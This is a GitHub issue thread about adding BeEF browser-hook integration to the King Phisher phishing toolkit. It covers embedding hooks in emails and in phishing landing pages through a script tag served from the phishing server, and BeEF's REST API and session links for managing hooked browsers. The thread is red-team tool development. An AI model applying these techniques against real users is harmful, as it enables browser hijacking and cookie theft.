### ISSUE TITLE
[suggestion] beef integration 

### ISSUE THREAD

**Issue by thesle3p** [securestate/king-phisher#50]
Hi, I was thinking of different ways to get access to a system through email other then attachments and links to browser exploits when I remembered that by default  many Email clients will run JavaScript embedded in Emails automatically, this would mean that if you were to embed a Beef Hook in to a phishing email theoretically you could get limited access to that machine via the Browser Exploitation Framework. So why not add the option to embed beef hooks in email templates and maybe add some functionality to the client to interface with Beef's REST API for infected host management?

**Comment by zeroSteiner** [comment]
I've had a feature request open with the BEEF project for some time now to allow simply linking to an infected host in the web interface which is how I'd like to see King Phisher integrate with it as to eliminate the need to reproduce features provided in BEEF's interface. You can check the status, it's beefproject/beef#1003.

As for putting JS into emails I'd have to test out how different clients and web interfaces handle it. There's nothing to stop you from adding in any javascript or HTML that you'd like right now, just edit the template. I'm not convinced that the JS environment would be as fully featured as a standard browser so even if a hook were hypothetically inserted I'm not sure of the practical uses (stealing cookies, redirecting etc.). Obviously this would warrant some testing and research on our end so I'll see what I can do.

Thanks for the suggestion.

**Comment by thesle3p** [comment]
I suspect at the very least you could use email clients as a proxy via
BEEF which for a red team assessment is very useful. I also wonder what
you could pull off on mobile email clients as the security of those
seems to be pretty bad of late. Let me know how testing works on your
end, I plan on doing the same soon.

**Comment by wolfthefallen** [comment]
@thesle3p 

We have conducted research to see if embedding the beef hook into the html body of the email. Unfortunately email clients do not execute the script. We tried it on multiple platforms, browsers, and email clients.

- Internet Explorer ( Windows) Gmail and OWA
- Chrome (Linux, Windows) Gmail, and OWA
- Firefox (Windows) with Gmail
- Outlook (Windows) 

What we propose at this time is to run Beef Server as a separate instance and place the beef hook script block into your phishing landing page. You can do this dynamicly by putting your beef hook into the kp.js and in your template just simply do <script src="http://{{ server.address }}/ks.jp" ></script>. This is will keep it dynamic through your all of your phishing landing pages. 

When issue beefproject/beef#1003 is resolved we will defiantly work on integrating the Beef API into King Phisher.

**Comment by bcoles** [comment]
@thesle3p @zeroSteiner Three years on, this has finally be implemented, albeit poorly. It should be available in the next version of BeEF, version `0.4.7.1-alpha`, which is scheduled for release by 2019-03-03.

A browser may be referenced like so:

* `http://beef.local:3000/ui/panel#id=<session>`

A few things of note.

Unfortunately, the currently implementation does not allow the `#id=` to survive through the authentication process. As such, the user must authenticate before using one of these links.

Also note that the `/ui/` portion of the URL is user-configurable. A "hardened" BeEF install should make use of a different path for the Admin UI (specified in the `beef.extension.admin_ui.base_path` configuration property in the Admin UI extension's [config.yaml](https://github.com/beefproject/beef/blob/master/extensions/admin_ui/config.yaml) configuration file).

The `session` specified in the `id=` parameter is not the hooked browser ID (it is not an integer). It is the zombie's session ID, and will look something like this: `YZBq38OMoW4Q2JD5YHhzhg5LlsbmH65G66pacvYk3Spd83LkDsrIkZRI8ZpbzmQNDkqQeMy9Kh0Hf2ZN`.

BeEF exposes a REST API which you can use to retrieve hooks and browser details, including the relevant session IDs. There are a few rudimentary example scripts available [here](https://github.com/beefproject/beef/tree/master/tools/rest_api_examples).

An excerpt of example output from the `browser-details` example REST API script is shown below.

```
["0",
 {"id"=>1,
  "session"=>
   "jo9ZhYoXlHQSmbQ4DcTWnBuJcyYCIw3973huJd1UFDqFVLsqghZVAFISJeTi92BVMiB78PX2dEe6tnwM",
  "name"=>"FF",
  "version"=>"60",
  "os"=>"Linux",
  "os_version"=>"",
  "platform"=>"Linux x86_64",
  "hardware"=>"Unknown",
  "ip"=>"172.16.191.123",
  "domain"=>"172.16.191.165",
  "port"=>"3000",
  "page_uri"=>"http://172.16.191.123:3000/demos/basic.html",
  "firstseen"=>"1551004589",
  "lastseen"=>"1551005541",
  "date_stamp"=>"Sun Feb 24 2019 01:36:29 GMT-0500 (EST)",
  "city"=>"Unknown",
  "country"=>"Unknown",
  "country_code"=>nil},
```

Note that the format of the REST API is subject to change, but hopefully not too much. The REST API currently offers no filtering or pagination, so you'll have to retrieve either everything at once, or items one-by-one. Eventually, this will be fixed.

---

> We have conducted research to see if embedding the beef hook into the html body of the email. Unfortunately email clients do not execute the script. We tried it on multiple platforms, browsers, and email clients.

I'm not sure on the current state of JavaScript support in modern email clients.

In theory, BeEF should execute in any JavaScript engine which allows execution of remotely-hosted JavaScript resources (ie, permissive CSP). In practice, there's probably some false assumptions about `window` and `document` - in particular `document.body` - which may result in failure.

It is worth noting that BeEF makes use of a `beef_init()` function which is executed after N seconds (default: 1 second). If a BeEF hook is loaded into a page *after the page has fully loaded* (ie, DOM XSS), then the BeEF hook *will not execute until this `beef_init()` function is called*. This is important, as the `beef_init()` function was causing issues and has been disabled and re-enabled a bunch of times. It's possible that this was disabled during your tests which may have affected the results. This function has now been reinstated and should work as described.
